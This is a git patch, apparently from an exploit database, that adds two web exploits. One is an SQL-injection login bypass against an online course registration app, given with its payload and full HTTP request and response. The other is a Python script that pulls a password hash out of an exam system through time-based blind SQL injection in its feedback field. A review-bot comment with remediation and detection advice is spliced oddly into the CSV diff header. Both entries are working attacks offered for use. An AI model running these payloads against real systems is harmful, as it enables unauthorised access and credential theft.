From d0531a5e12527acac56c8c13c4b2fbe056850322 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 6 Jun 2020 05:01:55 +0000
Subject: [PATCH] DB: 2020-06-06

2 changes to exploits/shellcodes

Online Course Registration 1.0 - Authentication Bypass
Online-Exam-System 2015 - 'feedback' SQL Injection
---
 exploits/php/webapps/48559.txt | 40 ++++++++++++++++++++++++++++++++++
 exploits/php/webapps/48560.py | 34 +++++++++++++++++++++++++++++
 files_exploits.csv | 2 ++
 3 files changed, 76 insertions(+)
 create mode 100644 exploits/php/webapps/48559.txt
 create mode 100755 exploits/php/webapps/48560.py

diff --git a/exploits/php/webapps/48559.txt b/exploits/php/webapps/48559.txt
new file mode 100644
index 000000000..1cac98d7f
--- /dev/null
+++ b/exploits/php/webapps/48559.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Online Course Registration 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-06-05
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : admin/index.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+
+http://localhost/Online%20Course%20Registration/admin/index.php
+
+POST /Online%20Course%20Registration/admin/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 61
+Referer: http://localhost/Online%20Course%20Registration/admin/index.php
+Cookie: PHPSESSID=il6a0lzq8ndo1bb4672rd7cr3m
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined
+
+HTTP/1.1 302 Found
+Date: Thu, 04 Jun 2020 20:04:27 GMT
+Server: Apache/2.4.39 (Win64) PHP/7.3.5
+X-Powered-By: PHP/7.3.5
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+location: http://localhost/Online Course Registration/admin/change-password.php
\ No newline at end of file
diff --git a/exploits/php/webapps/48560.py b/exploits/php/webapps/48560.py
new file mode 100755
index 000000000..7e9fce954
--- /dev/null
+++ b/exploits/php/webapps/48560.py
@@ -0,0 +1,34 @@
+# Exploit Title: Online-Exam-System 2015 - 'feedback' SQL Injection
+# Date: 2020-06-04
+# Exploit Author: Gus Ralph
+# Vendor Homepage: https://github.com/sunnygkp10/
+# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git
+# Affected Version: 2015
+# Tested on: Ubuntu
+# CVE : N/A
+
+import requests, string, time
+from sys import stdout
+
+URL = raw_input("Please enter the URL to attack (example http://localhost/Online-Exam-System/)\n")
+
+payload = "feedback' , '2020-06-04', '01:58:10am'),('1337','test','test@test.com','test',(SELECT CASE WHEN (SELECT EXISTS(SELECT password FROM user WHERE password REGEXP BINARY '^"
+payload2 = ".*'))=1 THEN sleep(5) ELSE sleep(0) END),'2020-06-04', '01:58:10am'); -- -"
+so_far = hash = ""
+while True:
+ for i in string.digits + string.ascii_lowercase:
+ so_far = hash + i
+ payload_to_send = payload + str(so_far) + payload2
+ data = {"name":"test","email":"test@test.com","subject":"test","feedback":payload_to_send}
+ start = time.time()
+ r = requests.post(URL + "feed.php", data = data)
+ request_time = time.time() - start
+ if request_time > 5:
+ hash += i
+ stdout.write(i)
+ stdout.flush()
+ break
+ if len(hash) > 31:
+ stdout.write("\n")
+ print "Hash found: " + hash
+ break
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ca945761d..1cf93bd8b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
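Review bot: The header comments at the top of the hunk name the product and the `feedback` parameter but say nothing about the root cause or the fix, which is what a reader triaging this entry needs most; suggest adding after the `# CVE : N/A` line a comment such as `# Root cause / fix: the 'feedback' field posted to feed.php is evidently interpolated into an INSERT statement; bind it as a prepared-statement parameter` (the INSERT shape is inferred from the payload string, not shown directly). The Python lines also assign to `hash`, shadowing the builtin, and use Python 2 only syntax (`raw_input`, the `print` statement), which the header should state so the entry's runtime is unambiguous. From a detection standpoint the technique is time-based (the `request_time > 5` comparison against the `sleep(5)` in the payload), so a feed.php request whose `feedback` parameter contains `SELECT` or `sleep(` and takes five seconds or more to answer is the observable signature worth logging and alerting on.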
@@ -42785,3 +42785,5 @@ id,file,description,date,author,type,platform,port
 48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
 48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
 48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple,
+48559,exploits/php/webapps/48559.txt,"Online Course Registration 1.0 - Authentication Bypass",2020-06-05,BKpatron,webapps,php,
+48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php,